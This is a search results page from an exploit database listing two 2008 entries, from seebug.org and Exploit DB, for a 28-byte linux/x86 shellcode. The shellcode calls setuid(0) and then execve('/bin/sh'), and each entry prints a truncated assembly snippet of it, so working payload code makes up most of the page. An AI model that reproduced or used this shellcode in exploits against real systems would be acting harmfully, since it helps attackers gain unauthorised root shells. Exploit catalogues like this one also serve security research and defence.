Lucene search
+L

2 matches found

seebug.org
seebug.org
added 2008/11/13 12:0 a.m.22 views

linux/x86 setuid(0) & execve(/bin/sh 0 0) shellcode 28 bytes

No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/11/13 12:0 a.m.29 views

linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes

linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes. Shellcode exploit for linx86 platform -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f...

7.4AI score
SaveExploits0
Rows per page
Query Builder